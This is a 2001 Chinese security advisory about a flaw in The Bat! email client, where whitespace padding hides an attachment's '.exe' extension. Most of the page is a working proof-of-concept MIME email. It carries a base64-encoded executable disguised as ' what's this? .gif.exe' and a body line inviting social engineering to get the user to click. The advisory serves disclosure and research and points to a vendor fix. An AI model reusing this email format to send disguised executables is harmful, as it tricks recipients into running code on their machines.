首页 -> 安全研究
安全研究
安全漏洞
"The Bat!" 附件名不完整显示漏洞
发布日期:2001-04-10
更新日期:2001-04-10
受影响系统:
Rit Research Labs The Bat! 1.49描述:
Rit Research Labs The Bat! 1.48
Rit Research Labs The Bat! 1.47
Rit Research Labs The Bat! 1.46
Rit Research Labs The Bat! 1.45
Rit Research Labs The Bat! 1.44
Rit Research Labs The Bat! 1.43
Rit Research Labs The Bat! 1.42f
Rit Research Labs The Bat! 1.42
Rit Research Labs The Bat! 1.41
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
Rit Research Labs The Bat! 1.39
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
Rit Research Labs The Bat! 1.36
Rit Research Labs The Bat! 1.35
Rit Research Labs The Bat! 1.34
Rit Research Labs The Bat! 1.33
Rit Research Labs The Bat! 1.32
Rit Research Labs The Bat! 1.31
Rit Research Labs The Bat! 1.22
Rit Research Labs The Bat! 1.21
Rit Research Labs The Bat! 1.19
Rit Research Labs The Bat! 1.18
Rit Research Labs The Bat! 1.17
Rit Research Labs The Bat! 1.15
Rit Research Labs The Bat! 1.14
Rit Research Labs The Bat! 1.101
Rit Research Labs The Bat! 1.1
Rit Research Labs The Bat! 1.043
Rit Research Labs The Bat! 1.041
Rit Research Labs The Bat! 1.039
Rit Research Labs The Bat! 1.037
Rit Research Labs The Bat! 1.036
Rit Research Labs The Bat! 1.035
Rit Research Labs The Bat! 1.032
Rit Research Labs The Bat! 1.031
Rit Research Labs The Bat! 1.029
Rit Research Labs The Bat! 1.028
Rit Research Labs The Bat! 1.015
Rit Research Labs The Bat! 1.011
Rit Research Labs The Bat! 1.0 build 1349
Rit Research Labs The Bat! 1.0 build 1336
"The Bat!"是Rit Research Labs开发的Windows平台上的邮件客户端程序。
一个远程攻击者可以精心构造一封电子邮件,带有附件,而此附件的名字由于超长空
白字符将不能正常显示给最终用"The Bat!"接收这封电子邮件的用户。如果附件是一
个可执行文件,用户打开附件时将被执行。潜在地损害了用户的本地安全性。
<* 来源:(http-equiv@excite.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0030_01C0B7CD.37BEBE40"
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V9.99.1320.620a
This is a multi-part message in MIME format.
------=_NextPart_000_0030_01C0B7CD.37BEBE40
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Trivial social engineering <inserted here> will get you to click that
28.03.01 http://www.malware.com
------=_NextPart_000_0030_01C0B7CD.37BEBE40
Content-Type:image/gif;
Content-Transfer-Encoding: base64
Content-Disposition: inline;
filename=" what's this?
.gif.exe"
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
AAAAAAAAAAAPAAAQAAARAAASAAATAAAUAAAVAAAWAAAXAAAYAAAZAAAaAAAbAAAcAAAdAAAeAAAf
AAAgAAAhAAAiAAAjAAAkAAAlAAAmAAAnAAAoAAApAAAqAAArAAAsAAAtAAAuAAAvAAAwAAAxAAAy
AAAzAAA0AAA1AAA2AAA3AAA4AAA5AAA6AAA7AAA8AAA9AAA+AAA/AAA/AAA/AAA/AQA/AgA/AwA/
BAA/BQA/BgA/BwA/CAA/CQA/CgA/CwA/DAA/DQA/DgA/DwA/EAA/EQA/EgA/EwA/FAA/FQA/FgA/
FwA/GAA/GQA/GgA/GwA/HAA/HQA/HgA/HwA/IAA/IQA/IgA/IwA/JAA/JQA/JgA/JwA/KAA/KQA/
KgA/KwA/LAA/LQA/LgA/LwA/MAA/MQA/MgA/MwA/NAA/NQA/NgA/NwA/OAA/OQA/OgA/OwA/PAA/
PQA/PgA/PwA/PwA/PwA/PwE/PwI/PwM/PwQ/PwU/PwY/Pwc/Pwg/Pwk/Pwo/Pws/Pww/Pw0/Pw4/
Pw8/PxA/PxE/PxI/PxM/PxQ/PxU/PxY/Pxc/Pxg/Pxk/Pxo/Pxs/Pxw/Px0/Px4/Px8/PyA/PyE/
PyI/PyM/PyQ/PyU/PyY/Pyc/Pyg/Pyk/Pyo/Pys/Pyw/Py0/Py4/Py8/PzA/PzE/PzI/PzM/PzQ/
PzU/PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8=
------=_NextPart_000_0030_01C0B7CD.37BEBE40--
<------------------cut here--------------------->
参看http://www.malware.com/guano.eml
建议:
访问http://www.ritlabs.com/,获取修正此漏洞的beta版
浏览次数:5411
严重程度:0(网友投票)
绿盟科技给您安全的保障